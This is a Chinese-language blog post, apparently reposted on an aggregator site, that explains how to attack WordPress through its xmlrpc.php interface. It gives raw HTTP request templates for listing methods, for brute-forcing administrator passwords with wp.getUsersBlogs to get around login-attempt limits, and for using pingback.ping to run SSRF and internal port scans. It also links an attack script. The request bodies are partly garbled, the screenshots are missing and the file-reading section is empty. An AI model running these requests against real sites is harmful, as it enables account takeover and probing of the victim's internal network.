wordpress发布模块(WordPress xmlrpc.php 漏洞利用)WordPress教程 / 利用WordPress XML-RPC API进行远程发布...

wufei123 发布于 2024-07-03 阅读(2)

WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容 所以,你可要通过客户端来管理Wordpress 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。

同时,XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则0X01 激活XML-RPC从3.5版本开始,XML-RPC功能默认开启 早些版本,可通过如下方法激活:Settings > Writing > Remote Publishing and check the checkbox.。

路径:http://example.com/wordpress/xmlrpc.php

image.png0x02 查看系统允许的方法POST/wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 <

methodCall>system.listMethods

image.png0x03 账号爆破一般情况下,wordpress的管理后台都会设置账号登录失败次数限制,因此,可以通过xmlprc.php接口来进行爆破通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以使用其他的方法。

构造请求包:POST/wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99

>wp.getUsersBlogsadminpassword

>

image.png爆破成功会返回博客的内容:

image.png0x03 SSRFWordPress 版本< 3.5.1通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

构造请求包:POST/wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99

>pingback.ping要探测的ip和端口:http://127.0.0.1:80

>网站上一篇博客的URL:http://localhost/wordpress/?p=1)

IP和端口存在,返回包中的中的值大于0:

image.png利用脚本:https://github.com/FireFart/WordpressPingbackPortScanner0x04 读取文件:

image.png

image.png0x99 参考:https://codex.wordpress.org/zh-cn:XML-RPC_Supporthttp://xmlrpc.com/https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32

https://www.acunetix.com/blog/web-security-zone/wordpress-pingback-vulnerability/http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

河南中青旅行社综合资讯 奇遇综合资讯 盛世蓟州综合资讯 综合资讯 游戏百科综合资讯 新闻36246